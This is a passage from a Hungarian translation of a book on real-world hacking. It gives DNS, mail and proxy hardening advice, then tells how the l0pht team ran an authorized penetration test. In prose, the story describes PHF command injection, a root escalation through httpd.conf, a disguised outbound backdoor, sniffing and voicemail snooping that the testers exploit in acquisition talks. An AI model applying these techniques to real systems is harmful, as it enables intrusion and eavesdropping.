használ. (Adrian elmondta, hogy mind a New York Times, mind az
Excite@Home elleni támadása során kipróbálta ezt a módszert –
mindkét esetben sikertelenül.) Az adatok védelme miatt az elsődleges
DNS szervert általában úgy állítják be, hogy a többi jogosult
szervernek engedélyt adnak az adott domainhez tartozó DNS rekordok
lemásolására. Ha az elsődleges szervert nem megfelelően
konfigurálják, a támadó zone transfert kezdeményezhet az általa
kijelölt bármelyik számítógépre, és ily módon részletes információhoz
jut a domain összes hostjáról és az azokhoz tartozó IP-címekről.
Az ilyen jellegű támadás elleni védekezés annyiból áll, hogy a zone
transfert csupán az üzleti műveletekhez feltétlenül szükséges,
megbízható rendszerek között engedélyezzük. Hogy pontosabbak
legyünk, a DNS szervert úgy kell beállítani, hogy a transzfereket csak a
megbízható második DNS szerverre engedélyezze.
Ezen túlmenően egy alapértelmezett tűzfalszabályt kell használni,
amely minden céges névszerveren letiltja az 53-as TCP porthoz való
hozzáférést. És egy másik tűzfalszabályt kell megfogalmazni, amely
engedélyezi a megbízható másodlagos névszervereknek az 53-as TCP
porthoz való csatlakozást, és a zone transferek kezdeményezését.
A cégeknek meg kellene nehezíteni a hackerek dolgát, hogy a
fordított DNS keresés technikáját használják. Noha kényelmes az olyan
hostnevek használata, amelyek egyértelműen jelzik, hogy az adott
hostot mire használják, például adatbázis.Xcég.com, nyilvánvaló, hogy
megkönnyítik a behatoló dolgát, amikor az a támadni érdemes
rendszerek után kutat.
Az egyéb információszerzést szolgáló fordított DNS keresési
technikák közé tartoznak a szótár– és a brute-force támadások. Ha
például kevinmitnick.com a célozandó domain, a szótártámadás a
szótárban levő összes szót a sz6.kevinmitnick.com formában a domain
elé helyezve próbálja meg a domainhez tanozó további hostokat
azonosítani. Egy brute-force fordított DNS támadás sokkal
összetettebb; itt az előtag alfanumerikus karakterek sorozata, amely
egyszerre egy karakterrel növekedve az összes lehetőségen végigfut. A
módszer megakadályozásához a céges DNS szervert úgy kell beállítani,
hogy megszüntesse a belső hostnevek DNS rekordokban való
megjelenítését. És a belső DNS szerver mellett egy külső szervert is
használni kell, így a belső hostnevek nem szivárognak ki a nem
megbízható hálózatba. Az elkülönített belső és külső név szerverek
használata a hostneveket illető, fent említett aggályokat is segít
eloszlatni: egy a külvilágtól tűzfallal védett belső DNS szerver már
sokkal kisebb kockázat mellett használhat olyan, az azonosítást
könnyebbé tevő hostneveket, mint például a database, a research és a
backup.
Adrian fontos információhoz jutott a New York Times hálózatáról
azzal hogy megvizsgálta egy az újságtól kapott e-mail fejlécét, amely
egy belső IP-címet árult el neki. A hackerek szándékosan
visszapattintatnak e-maileket annak érdekében, hogy ilyen jellegű
információt kapjanak, vagy nyilvános levelezőlistákban kutatnak
hasonlóan árulkodó e-mail üzenetek után. A fejléc információi
rengeteg értékes tudnivalót közölhetnek, így például belsőleg használt
elnevezési konvenciókat, belső IP-címeket és az e-mail által megtett
utat. Ez ellen azzal védekezhetnek a cégek, hogy az SMTP (Simple
Mail Transfer Protocol) szerverüket úgy állítják be, hogy az a kimenő
levelekből kiszűrje a belső IP-címeket és hostinformációkat,
megakadályozva a belső azonosítók nyilvánosságra kerülését.
Adrian elsődleges fegyvere a hibásan konfigurált proxyszerverek
megtalálása iránti képessége volt. Emlékezzünk rá, hogy a
proxyszerverek egyik célja az, hogy a számítógépes hálózat
biztonságos oldalán ülő felhasználóknak hozzáférést engedjen a
megbízhatatlan oldalon levő forrásokhoz. A belül levő felhasználó egy
adott weboldalt kér le; a kérés a proxyszerverhez megy, amely a
felhasználó nevében továbbítja azt, és a választ a felhasználóhoz küldi.
Annak érdekében, hogy megakadályozzuk a hackereknek az Adrian
által is használt módon történő információszerzését, a proxyszervereket
úgy kell beállítani, hogy csak a belső kezelőfelületre hallgassanak.
Vagy ehelyett úgy is konfigurálhatjuk őket, hogy csak a megbízható
külső IP-címek engedélyezett listájára hallgassanak. Ily módon az arra
nem jogosult külső felhasználók még csatlakozni sem tudnak. Gyakori
hiba olyan proxyszerverek beállítása, amelyek minden hálózati
interfészre hallgatnak, még az Internethez csatlakoztatott külső
interfészekre is. Ezzel szemben a proxyszervereket úgy kellene
konfigurálni, hogy az IP-címeknek csupán egy olyan tartományát
engedélyezzék, amelyet az Internet Azonosító Számok Hatósága
(Internet Assigned Numbers Authority – IANA) a magánhálózatok
számára tartott fenn. A magán IP-címeknek három tartománya van;
10.0.0.0-tól 10.255.255.255-ig
172.16.0.0-tól 172.31.255.255-ig
192.168.0.0-tói 192.168. 255.255-ig
Az is jó ötlet, ha portkorlátozással határt szabunk a proxyszerver
által megengedett szolgáltatásoknak, például korlátozzuk a HTTP-re
(Internet kapcsolat) vagy HTTPS-re (biztonságos Internet kapcsolat)
kimenő kapcsolatokat. A további ellenőrzés érdekében egyes SSL-t
(Secure Sockets Layer) használó proxy szerverek beállíthatók úgy,
hogy a forgalom kezdeti állapotát megvizsgálva meggyőződhessenek
arról, hogy egy jogosulatlan protokoll nem lett egy ellenőrzött porton
keresztül átvezetve. E lépések csökkentik a támadó arra irányuló
lehetőségeit, hogy a proxyszerverrel visszaélve olyan szolgáltatásokhoz
csatlakozzon, amelyekre nem jogosult.
A proxyszerver telepítése és konfigurálása után tesztelni kell azt a
sebezhetőségekkel szemben. Mindaddig nem tudhatjuk, hogy
sebezhetők vagyunk-e, amíg a rendszert ki nem próbáljuk a biztonsági
hibákkal szemben. Ingyenes proxy ellenőrző alkalmazás az Internetről
is letölthető[5].
És még valami: mivel bizonyos körülmények között egy
szoftvercsomagot telepítő felhasználó a tudomása nélkül
proxyszerverszoftvert is telepíthet, a céges biztonsági gyakorlatnak
tartalmaznia kell egy olyan rutinszerű ellenőrzést, amely a nem
szándékosan telepített, nem hivatalos proxyszerverek után kutat. A
hálózatunkat letesztelhetjük akár Adrian kedvenc eszközével, a Proxy
Hunterrel is. Ne feledjük, hogy egy hibásan beállított proxyszerver a
hacker legjobb barátja.
Rengeteg hackertámadást előzhetünk meg, ha egyszerűen a legjobb
biztonsági gyakorlatot követjük, illetve a megfelelő gondossággal
járunk el. A véletlenül nyitva hagyott proxy veszélyei felett túl gyakran
szemet hunyjunk, s ez komoly sebezhetőséget jelent rengeteg szervezet
számára. Még mindig nem mondtuk el elégszer?

ZÁRÓJELBEN

Akármilyen területen találkozunk velük, az eredeti gondolkodású


emberek, illetve az olyanok, akik mélyre ásnak gondolataikban, és akik
tisztábban látják a világot (vagy legalább annak egy részét), mint a
többi ember, megérdemlik a bátorítást.
És az olyan embereket, mint Adrian Lamo, megéri jó útra terelni.
Adrianben megvan az a képesség, hogy komolyan hozzájáruljon a világ
jobbá tételéhez. Érdeklődéssel fogom követni az életútját.

JEGYZETEK

1. A kormányzat sajtóközleménye a
www.usdoj.gov/criminal/cybercrime/lamoCharge.htm oldalon
olvasható.
2. Lásd www.usdoj.gov/criminai/cybercrime/lamoChorge.htm.
3. További információért lásd www.crime-
research.org/library/Kevin2.htm.
4. Lásd www.infoworld.com/article/04/07/16/HNIamohome_l.html.
5. További információért lásd www.corpit.ru/mjt/proxycheck.html

6. fejezet

A behatolási tesztelés bölcsessége és butasága


Nagyon is igaz a mondás: a biztonsági rendszereknek mindig
győzniük kell, a támadónak elég egyszer.
Dustin Dykes
Gondoljunk egy börtönigazgatóra, aki – abbéli aggodalmában, hogy
a fogva tartottak valamilyen rést kihasználva elillannak – szakértőt
bérel fel az általa vezetett intézmény biztonsági eljárásainak
ellenőrzésére. A vállalatok ugyanezt a gondolkodásmódot követik,
amikor azzal bíznak meg egy biztonsági céget, hogy felbérelt
támadókkal teszteljék weboldaluk és számítógépes rendszereik
behatolással szembeni sérthetetlenségét. A támadók megpróbálnak
hozzájutni a bizalmas információkhoz, megkísérelnek bejutni az
irodatér korlátozott hozzáférésű részeibe, illetve sok egyéb módszerrel
kutatnak az olyan biztonsági rések után, amelyek kockázatot hordoznak
magukban a cégek számára.
A biztonságtechnikában dolgozók behatolási tesztnek hívják ezt az
eljárást. Az ezeket a gyakorlatokat végző biztonsági cégek személyzete
gyakran korábbi hackerekből áll (nocsak, nocsak). Sok esetben
valójában a cégek alapítói azok, akik széles körű
hackertapasztalatokkal rendelkeznek, és szeretnék, ha az ügyfeleik
soha nem szereznének erről tudomást. Igenis van értelme és haszna
annak, hogy a biztonsági szakemberek gyakorta a hackerközösségből
jönnek, hiszen egy tipikus hacker igen jól tájékozott a cégek által
véletlenül nyitva hagyott, a belső információkhoz vezető bejáratokat
illetően, legyenek azok jól vagy kevésbé ismertek. Sok ilyen korábbi
hacker tizenéves kora óta tisztában van azzal, hogy az esetek
többségében bizony nem a „biztonság” a megfelelő kifejezés.
Ha egy behatolási tesztet megrendelő cég azt várja, hogy az
eredmények megerősítik biztonsági rendszerük érinthetetlenségét és
hibátlanságát, jobb, ha felkészül az álomból való durva felébredésre. A
biztonsági kiértékeléseket végző szakemberek gyakran találkoznak
ugyanazokkal a régi hibákkal – a cégek egyszerűen nem elég
körültekintően védik bizalmas információikat és számítógépes
rendszereiket. Az üzleti vállalkozások és kormányzati szervek azért
végeztetnek biztonsági kiértékeléseket, hogy időről időre megállapítsák
biztonsági állapotukat. Ráadásul az azonosított sebezhetőségek
kijavítása után folyamatosan növelhetik a biztonsági szintjüket. Igen,
egy behatolási teszt egy EKG-val ér fel. A következő nap egy hacker
egy nulladik napi exploittal betörhet akkor is, ha a szóban forgó vállalat
vagy intézmény kiváló minősítést szerzett az értékelés során.
Abban a hitben megrendelni a behatolási tesztet, hogy az
megerősítést ad majd a bizalmas információk védelmében végzett
kiváló munkára, egyszerűen butaság. Az eredmények nagy
valószínűséggel pontosan az ellenkezőjét fogják bizonyítani, ahogy ezt
a következő történetek is tanúsítják – az egyik esetben egy tanácsadó a
másik esetben pedig egy gyógyszeripari cégnél.

HIDEG TÉL

Nemrégiben egy New England-i vezető informatikai tanácsadó cég


menedzserei és felsővezetői a cég tárgyalójában gyűltek össze, hogy
két tanácsadóval találkozzanak. El tudom képzelni, hogy az asztalnál
levő műszaki emberek mennyire kíváncsiak voltak az egyik
tanácsadóra, Pieter Zavkóra, a „Mudge” néven széles körben ismert
exhackerre.
Még az 1990-es évek elején Mudge és egy társa hasonló
gondolkodású fickókból egy bostoni raktárházban levő szűk irodában
dolgozó csapatot hozott létre; a csapatból igen elismert számítógépes
biztonsági cég lett l0pht, illetve a pontosság – és a vicc – kedvéért l0pht
Heavy Industries néven. (A nevet kis L betűvel, az o helyett nullával,
és – a hackerstílusban megszokott módon – f helyett ph-val írják, és
„loft”-nak ejtik. Így a név körülbelül padlás nehézipari műveket jelent.)
Ahogy működésük egyre és egyre sikeresebb lett és hírük mindenfele
elterjedt, Mudge-ot hívták, hogy tudását másokkal is megossza. Olyan
helyeken tartott előadásokat, mint például az amerikai hadsereg
monterey-i stratégiai iskolája, ahol a téma az „információs hadviselés”
volt – hogyan jussunk be az ellenség számítógépeibe és tegyük tönkre
azok működését észrevétlenül, milyen technikákkal lehet adatokat
megsemmisíteni, és így tovább.
A számítógépes hackerek (és néha a biztonsági szakemberek) egyik
kedvenc eszköze a l0phtCrack nevű szoftvercsomag. A program szinte
biztos eredményt garantál a felhasználóknak, de gyanítom, hogy sokan
másik szívből gyűlölik ezért. A l0pht csapatot komoly médiaérdeklődés
övezte, mert írtak egy jelszó hash-eket gyorsan feltörő programot –
nem nehéz kitalálni, hogy a l0phtCracket. Mudge egyike volt a
l0phtCrack megalkotóinak, és társaival alapított egy a programot a
hackerek, illetve bárki számára elérhetővé tevő internetes oldalt; a
program eleinte ingyenes volt, később azonban pénzforrást csináltak
belőle.

Az első megbeszélés
A tanácsadó cég (hívjuk őket „NewT:on”-nak) azt követően hívta a
l0phtot, hogy elhatározták, hogy behatolási tesztekkel kell bővíteniük
az ügyfeleiknek kínált szolgáltatásaik körét. Ahelyett, hogy új
szakembereket vennének fel és a részleget fokozatosan építenék fel,
egy létező szervezetet kívántak felvásárolni, amit aztán házon belül
alkalmaznak. A beszélgetés elején a cég egyik embere feldobta az
ötletet: – Meg kívánjuk vásárolni vállalkozásukat és cégünk részévé
tenni azt. – Mudge emlékszik a reakciójukra:
Valami olyasmit mondtunk: – Nos, hát nem is tudnak rólunk szinte
semmit. – Tudtuk, hogy főként a l0phtCrack által kavart médiaviharból
ismertek minket.
Részben azért, hogy időt nyerjen és hozzászokhasson a cég
eladásának ötletéhez, részben azért, mert nem akart előkészületlenül
tárgyalásokba bocsátkozni, Mudge időhúzó taktikával állt elő.
Azt mondtam: – Nézzék, nem is igazán tudják, hogy mit kapnának.
Mi lenne, ha... mit szólnának ahhoz, ha 15 ezer dollárért alapos
behatolási tesztet hajtanánk végre az önök szervezetén?
Akkoriban a l0pht még csak nem is behatolási tesztekre szakosodott
cég volt. De azt mondtam nekik: – Nem ismerik a képességeinket,
tulajdonképpen csak a hírünket hallották. Fizetnek nekünk 15 ezer
dollárt. Ha nem tetszik, amit kapnak, nem kell megvenni bennünket, de
még ekkor is megéri az időt, mert önök kapnak egy jó behatolási teszt
jelentést, nekünk pedig lesz 15 ezer dollárunk a bankban.
– Amennyiben tetszik a dolog és le lesznek nyűgözve, amiben én
biztos vagyok, akkor persze megvehetnek bennünket.
Azt mondták, hogy rendben, ez nagyszerű.
Én pedig azt gondoltam, hogy ezek milyen hülyék.
Mudge gondolatmenete szerint azért voltak „hülyék”, mert
feljogosították a l0pht csapatot, hogy törjenek be a fájljaikba és
levelezésükbe, miközben arról fognak tárgyalni, hogy megvásárolják a
céget. Teljes mértékben arra számított, hogy leselkedni tud majd a
hátuk mögött.

Alapszabályok

A behatolási tesztet végző biztonsági tanácsadók egy dologban


hasonlítanak a kábítószert vásárló beépített zsarukhoz: ha egy nem
kellőképpen informált másik zsaru felbukkan a tranzakció helyszínén
és fegyvert szegez rájuk, a beépített ember egyszerűen felmutatja a
jelvényét. Nem kell a börtön miatt aggódnia. A cégek védelmének
tesztelésével megbízott biztonsági tanácsadók ugyanilyen védelmet
kérnek maguknak. A jelvény helyett a tesztcsapat minden tagja kap a
cég egyik felsővezetője által aláírt levelet, amely – lényegében – azt
mondja, hogy „ezt a fickót egy számunkra elvégzendő projekttel bíztuk
meg, ha látszólag törvénytelen dolog közben kapjátok el, akkor sincsen
semmi gond. Semmi erőszakoskodás. Hagyjátok folytatni a munkáját,
és egy üzenetben tájékoztassatok a részletekről.”
A biztonsági közösségben ezt a levelet – a Monopoly után – „ingyen
szabadulsz kártyának” hívják. A tesztelők nagyon lelkiismeretesen
ügyelnek arra, hogy a levél egy másolata mindig náluk legyen, amikor
a megbízó cég létesítményeiben vagy azok közelében vannak, készülve
arra az eshetőségre, hogy egy biztonsági őr megállítja őket és
erődemonstrációt rendez nekik, vagy egy lelkiismeretes alkalmazott
gyanút fog, és elég határozott lesz ahhoz, hogy kérdőre vonja a
behatolási tesztelőt.
A teszt megkezdése előtt egy másik szokásos lépés az alapvető
szabályok ügyfél általi meghatározása – milyen működési területet
kívánnak bevonni a tesztbe és mely részek esnek kívül azon. Pusztán
technikai jellegű támadás készül annak kiderítésére, hogy képesek-e a
tesztelők nem kellőképpen védett rendszereket felfedezve vagy a
tűzfalon keresztüljutva bizalmas információkat megszerezni. A teszt
célja a cég nyilvános weboldalának, belső számítógépes hálózatának
vagy a teljes rendszerének alkalmazás szintű értékelése? Social
engineering támadást is bevetnek-e – megpróbálják rászedni az
alkalmazottakat bizalmas információk közlésére? És mi a helyzet a
fizikai támadásokkal, amelyek során a tesztelők a biztonsági őröket
kijátszva vagy a csak alkalmazottak számára fenntartott bejáratokon
keresztüljutva megkísérlenek beszivárogni az épületbe? Vagy
kukabúvárkodással próbálnak meg információt szerezni – vagyis a cég
szemétjében kutatnak jelszavakat vagy egyéb értékes adatokat
tartalmazó információkat keresve? Mindezeket előre kell tisztázni.
A cégek sok esetben csak korlátozott tesztet kívánnak végrehajtatni.
A l0pht csapat egyik tagja, Carlos ezt teljesen valóságtól
elrugaszkodott gondolkodásnak tartja, hiszen „a hackerek sem így
dolgoznak”. Ő személy szerint egy sokkal agresszívebb megközelítés
híve, ahol a kesztyűket leveszik és nincsenek megkötések. Az ilyen
jellegű teszt sokkal több mindent képes feltárni, ezért sokkal értékesebb
az ügyfél, illetve sokkal szórakoztatóbb a tesztelők számára is. Carlos
azt mondja, hogy „így sokkal mókásabb és érdekesebb”. Jelen esetben
teljesült Carlos kívánsága: a Neuron belegyezett a korlátozás nélküli
támadásba.
A biztonság alapvetően bizalmi kérdés. A megbízó félnek meg kell
bíznia a biztonsági értékelés végrehajtására felkért biztonsági cégben.
A legtöbb cég és kormányzati szerv titoktartási nyilatkozatot
(nondisclosure agreement – NDA) írat alá a megbízottal, amelyben jogi
eszközökkel védi bizalmas információit a jogosulatlan nyilvánosságra
hozástól.
Elterjedt szokás, hogy a behatolási tesztelők NDA-t írnak alá, hiszen
bizalmas információhoz férhetnek hozzá. (Természetesen egy NDA
majdnem teljesen feleslegesnek tűnik, hiszen egy olyan cég, amely
visszaélt valamely ügyfelének információival, aligha szerezhet további
ügyfeleket. A diszkréció alapkövetelmény.) A behatolási tesztelőknek
gyakran olyan kiegészítő záradékot kell aláírniuk, amelyben vállalják,
hogy minden tőlük telhetőt megtesznek azért, hogy ne akadályozzák a
megbízó cég normál napi működését.
A l0pht Newton teszttel foglalkozó csapata hét főből állt, akik
egyedül vagy párokban dolgoztak, és mindenki, illetve minden csapat a
cég működésének különböző területeire összpontosította figyelmét.

Támadás!

A l0pht csapat tagjai – kezükben az „ingyen szabadulsz” kártyákkal


– olyan rámenősek lehettek, amennyire csak akartak, sőt még „zajt is
csaphattak” – vagyis olyan tevékenységet is végezhettek, amellyel
felhívhatták magukra a figyelmet; egy behatolási tesztelő általában
kerüli az ilyen magatartást. Azért ők is abban reménykedtek, hogy
láthatatlanok maradnak. – Sokkal „királyabb minden információt
megszerezni és a végén tudni azt, hogy nem vettek észre Mindig erre
törekszel – mondja Carlos.
A Newton webszervere a népszerű Apache szerverszoftvert futtatta.
A Mudge által felfedezett első sebezhetőség az volt, hogy a célba vett
cég Checkpoint Firewall-1 csomagszűrő tűzfalának volt egy rejtett
alapértelmezett szabálya, amely az 53-as UDP (User Data Protocol)
vagy TCP (Transmission Control Protocol) portról érkező csomagokat
az 1023 feletti szinte összes portra beengedte. Első gondolata az volt,
hogy az NFS (Network File System – Hálózati Fájlrendszer)
használatával lemountolja (leszedi) az exportált fájlrendszereiket, de
gyorsan rájött, hogy a tűzfal egyik szabálya blokkolja az NFS daemon-
hoz (2049-es porthoz) való hozzáférést.
Jóllehet a gyakori rendszerszolgáltatások blokkolva voltak, Mudge-
nak tudomása volt a Solaris operációs rendszer egy nem dokumentált
funkciójáról, amely az rpcbind-et (a portmappert) egy 32770 feletti
porthoz kötötte. A portmapper osztja ki az egyes programoknak a
dinamikus portszámokat. A portmapperen keresztül Mudge képes volt
megkeresni azt a dinamikus portot, amelyhez a mount deamon
(mountd) szolgáltatás volt rendelve. Mudge elmondta, hogy a kérés
formátumától függően „a mount daemon a Hálózati Fájlrendszer
kéréseket is kezeli, mivel az ugyanazt a kódot használja. Megszereztem
a mount daemont a ponmappenől, majd az NFS kérésemmel felmentem
a mount daemonhoz.” Egy nfsshell nevű programmal képes volt
távolról leszedni a célba vett rendszer fájlrendszerét. Mudge erről a
következőket mondta; – Gyorsan megszereztük a betárcsázó számok
listáját. Egyszerűen letöltöttük a teljes exportált fájlrendszerüket.
Teljesen irányításunk alá vontuk a rendszerüket.
Mudge arra is rájött, hogy a célszerver a szinte minden rendszer
esetén megtalálható PHF lyukon keresztül is sebezhető (lásd a 2.
fejezetet: Amikor terroristák hívnak). Megtrükközte a PHF CGI
szkriptet, így tetszőleges parancsokat adhatott ki azáltal, hogy új sor
karakterként tüntette fel az Unicode sztringet, amit a futtatás
shellparancs követett. Amikor a PHF használatával szétnézett a
rendszerben, észrevette, hogy az Apache szerverfolyamat „nobody”
account alatt futott. Mudge örömmel látta, hogy a rendszergazdák
„lezárták a dobozt” – vagyis biztosították a számítógépes rendszert –,
hiszen pontosan ezt kell tenni, ha a szerver egy olyan megbízhatatlan
hálózathoz van csatlakoztatva, mint az Internet. Fájlok és könyvtárak
után kutatott abban a reményben, hogy talál egy írhatót. További
vizsgálatai során észrevette, hogy az Apache konfigurációs fájl
(httpd.conf) is a „nobody” account birtokában volt. Ez a hiba azt
jelentette, hogy képes volt a httpd.conf fájl tartalmának átírására.
Az volt a stratégiája, hogy megváltoztatja az Apache konfigurációs
fájlt, így az Apache következő újraindítása után a szerver
rendszergazdai jogosultságokkal fog futni. Azonban szüksége volt egy
olyan módszerre, amellyel a konfigurációt szerkesztve
meghatározhatja, hogy az Apache milyen felhasználó alatt fusson.
Egy Hobbit becenevű fickóval összedolgozva kitalálták, hogy a
netcat programmal – és néhány shelltrükkel – miként juthatnak a lehető
legközelebb egy interaktív shellhez. Mivel a rendszergazda
nyilvánvalóan „nobody”-ra változtatta a „conf” könyvtárban levő
fájlok tulajdonosát, a „sed” paranccsal Mudge képes volt a httpd.conf
szerkesztésére, így a következő újraindítás után az Apache
rendszergazdai jogosultságokkal fog majd futni. (Az Apache akkori
verziójának ezt a sebezhetőségét azóta kijavították.)
Mivel a változtatások az Apache következő újraindításáig nem
léptek érvénybe, Mudge kénytelen volt hátradőlni és várni. Amint a
szerver újra bebootol, ugyanazon PHF sebezhetőségen keresztül már
képes lesz rendszergazdaként kiadni a parancsokat; míg korábban ezek
a parancsok a „nobody” account alatt voltak végrehajtva, az Apache
most rendszergazdai jogosultságokkal fog majd futni. A
rendszergazdaként kiadott parancsokkal könnyű lesz teljes ellenőrzés
alá vonni a rendszert.
Eközben a l0pht támadások más frontokon is törtek előre. Amit a
hackelésben és biztonságtechnikában tevékenykedők többsége
kukabúvárkodásnak nevez, azt Mudge sokkal finomabb kifejezéssel
illeti: fizikai elemzés.
Kiküldtük az embereket fizikai elemzés elvégzésére. Az [ügyfél] egyik
alkalmazottját, gyanítom, nemrégiben rúgták ki, és ahelyett, hogy csak
a papírokat semmisítették volna meg, az egész íróasztalát a szemétbe
dobták. [A fiúk] a szemét közt találták meg az íróasztalt. A fiókok tele
voltak régi repülőjegyekkel, kézikönyvekkel és mindenfajta
belsődokumentummal.
Meg akartam mutatni [az ügyfélnek], hogy a jó biztonsági gyakorlat
nem csak a számítógépes biztonságról szól.
Ez így sokkal könnyebb volt, mintha az összes szeméten át kellett
volna rágni magunkat, mivel zúzógépet használtak. Az asztal azonban
nem fért bele a gépbe.
Még ma is megvan valahol ez az íróasztal.
A fizikai csapat a cég létesítményébe is bejutott egy egyszerű és –
megfelelő körülmények között – majdnem mindig biztos módszer, az
úgynevezett tail-gating használatával. Ez abból áll, hogy a támadó a
védett ajtón való áthaladáskor szorosan egy alkalmazott nyomában
lépked; különösen akkor működik kiválóan, amikor a céges étkezőből
vagy egyéb, főként alkalmazottak által használt területről kell a védett
területre bejutni. A legtöbb alkalmazott, különösen az alacsonyabb
beosztásban levők, vonakodnak konfrontálódni a sarkukban bejutó
idegennel, hiszen attól tartanak, hátha egy náluk magasabb beosztásban
levő kollégáról van szó.
Egy másik l0pht csapat a cég telefonos és hangpostarendszereit
vonta támadások alá. A szokásos kiindulópont ilyen támadás esetén
annak kiderítése, hogy az ügyfél melyik gyártó milyen típusú
rendszerét használja, majd a támadók a számítógépet war dialingre
állítva olyan mellékek után kutatnak, amelyeken az alkalmazottak nem
állítottak be saját jelszót, vagy pedig könnyen kitalálható jelszavakat
használnak. Amint sikerül egy sebezhető telefont találni, a támadók
bármilyen eltárolt hangpostaüzenetet lehallgathatnak. (A telefonos
hacke-rek, vagyis a „phreakerek” ugyanezzel a módszerrel
kezdeményeztek kimenő hívásokat a cég költségén.)
A war dialing közben a l0pht telefonos csapata olyan
telefonmellékeket azonosított, amelyen egy betárcsázó modem
válaszolt. Ezeket a betárcsázó kapcsolatokat gyakran védtelenül
hagyják, teljes mértékben a titkolózáson alapuló biztonság
megközelítésre támaszkodva, és ezek a modemek gyakran a tűzfal
„megbízható oldalán” vannak.

Áramszünet

A napok egyre teltek, a csapatok értékes információmorzsákat


gyűjtöttek, de Mudge még mindig nem tudott előállni a ragyogó
ötlettel, amely újraindításra késztetné az Apache rendszert, hogy utána
hozzáférést szerezzen a hálózathoz. Ekkor egy olyan tragédia történt,
amely meghozta a csapat számára a szerencsét:
A híreket hallgattam, és bemondták, hogy áramszünet volt abban a
városban, ahol a cég működött.
Igazából tragédia történt, mert az áramszolgáltató egyik
alkalmazottja meghalt egy a város másik felében történőrobbanásban,
azonban ez az egész városban kiütötte az áramot.
Azt gondoltam, hogy ha elég sokáig eltart, míg helyreállítják az
áramellátást, akkor valószínűleg lemerül a szerver szünetmentes
tápegysége.
Ami azt jelentené, hogy a szerver leáll. Amikor a város áramellátását
helyreállítják, a rendszer újraindul.
Ültem és állandóan a webszervert ellenőriztem, majd egyszer csak
leállt a rendszer Újra kellett indítaniuk. Az időzítés tökéletes volt
számomra. Amikor a rendszer felállt, láss csodát, az Apache
rendszergazdai jogosultságokkal futott, pontosan úgy, ahogy terveztük.
A l0pht csapat ennél a pontnál képes volt teljes mértékben feltörni a
gépet, amely ezt követően „a belső dobbantónk lett, ahonnan a
támadást indítottuk”. Carlos számára ez volt a „terepmunka napja”.
A csapat olyan kódot fejlesztett ki, amely valószínűtlenné tette, hogy
valaha kizárhatják őket a rendszerből. A céges tűzfalakat általában nem
állítják be a kimenő forgalom blokkolására, és Mudge a Newton egyik
szerverére telepített egyszerű kis programja néhány percenként egy, a
csapat ellenőrzése alatt levő számítógéphez csatlakozott. Ez a kapcsolat
a Unix, Linux és régi DOS operációs rendszerek felhasználói számára
ismerős „parancssor shellhez” hasonló parancssor interfészt biztosított
számukra. Más szavakkal, a newtonos gép rendszeres lehetőséget
biztosított Mudge csapatának arra, hogy a cég tűzfalát kikerülő
parancsokat adjanak ki.
Elkerülendő, hogy észrevegyék őket, Mudge úgy nevezte el a
szkriptjüket, hogy az elvegyüljön a rendszer háttérnyelvével. Bárki, aki
észrevette a fájlt, azt feltételezhette, hogy a normál munkakörnyezet
része.
Carios – abban a reményben, hogy megtalálja az alkalmazottak
bérszámfejtési adatait – elkezdett az Oracle adatbázisokban keresgélni.
– Ha meg tudod mutatni az informatikai vezetőnek a fizetési adatait és
hogy mennyi bonuszt kapott, akkor jellemzően mindent megtaláltál. –
Mudge egy sniffert állított be a cég összes kimenő és bejövő e-mailjére.
Akárhányszor egy Norton alkalmazott karbantartási feladatokat végzett
a tűzfalon, a l0pht tudott róla. Megdöbbenve látták, hogy egyszerű
szöveges hozzáférést (piain text) használtak a tűzfalra való belépéshez.
A l0pht rövid időn belül teljes mértékben uralta az egész hálózatot, és
adatokkal is tudták ezt bizonyítani. Nem véletlenül mondja Mudge; –
Tudod, szerintem sok cég pontosan ezért nem szeretne behatolási
tesztet végeztetni a hálózatain. Pontosan tudják, hogy az egész úgy
rossz, ahogy van.

Információ a hangpostákból

A telefonos csapat kiderítette, hogy a l0pht felvásárlásáról szóló


tárgyalásokat folytató felsővezetők némelyikének alapértelmezett
jelszó volt a hangpostafiókján. Mudge és csapattársai fülest kaptak –
ami részben vicces is volt.
Az egyik feltétel, amelyhez a l0pht eladását kötötték, egy
mobilegység létrehozása volt – egy olyan furgon, amelyet vezeték
nélküli eszközökkel szerelnének fel, és amit kódolatlan vezeték nélküli
kommunikáció lehallgatásához használnának a további behatolási
tesztek során. Az egyik felsővezető számára a furgon megvásárlásának
ötlete olyan felháborító volt, hogy elkezdett gúnyolódni ezen. A
hangpostája is tele volt a cég többi vezetőjétől érkező gúnyos
megjegyzésekkel, egyrészt ezzel, illetve általánosságban a l0pht
csapattal kapcsolatban. Mudge ezen egyszerre mosolygott és
bosszankodott.

A végső jelentés

A tesztidőszak végén Mudge és a csapat megírták a jelentésüket, és


felkészültek, hogy a Newton felsővezetőivel tartott megbeszélésen
átadják azt. A Newton embereinek fogalmuk sem volt arról, hogy mire
számítsanak; a l0pht csapat tudta, hogy „robbanásveszélyes” ülésre van
kilátás.
Szóval elővesszük a jelentést, felbontjuk és átadjuk nekik. És ott
ülnek megdöbbenve. Csak néztük ahogy ez a fantasztikus
rendszergazda, tényleg normális fickó megpróbál bejelentkezni az egyik
routerre, kipróbál egy jelszót, és nem működik, kipróbál egy másikat,
nem működik, kipróbál még egyet, nem működik az sem.
Ezek a különböző belső rendszerekre való rendszergazdai jelszavak
voltak, amelyeket a tesztelők néhány perc alatt megszereztek. Mudge
emlékszik rá, hogy milyen könnyen és egyszerűen ment.
Az érdekesebb rész a hangposták voltak, ahol a felvásárlásunkról
beszéltek. Nekünk azt mondták: – igen fiúk, mindannyiatokat akarjuk. –
Azonban a hangpostájukon egymás közt azt mondták: – Igen, akarjuk
Mudge-ot, de a többi fickót nem, amint átjönnek, kirúgjuk őket.
A megbeszélésen a l0phtos srácok lejátszottak néhányat az
érdekesebb hangpostaüzenetek közül, és jót mulattak, miközben látták,
hogy a newtonos vezetők saját kínos szavaikat hallgatják. De legjobb
még ezután jött. Mudge úgy időzítette a felvásárlásról szóló utolsó
tárgyalást, hogy az a jelentés átadása előtt megtörténjen. Nyilvánvaló
kárörömmel osztotta meg velünk annak a találkozónak a részleteit.
Szóval bejönnek és azt mondják: – Ennyit vagyunk hajlandók fizetni,
ezt a legmagasabb összeg, ameddig el tudunk menni, és ezeket a
dolgokat fogjuk csinálni. – De mi pontosan tudtuk, hogy mi igaz abból,
amit mondanak, és mi a hazugság.
Ezzel az alacsony ajánlattal jönnek elő. Majd megkérdezik, hogy
„nos, mit gondolnak?” Mire azt mondjuk, hogy „Nem hisszük, hogy
kevesebbel beérnénk, mint...” és bemondunk egy olyan összeget,
amelyről tudjuk, hogy legfeljebb ennyit fizetnének.
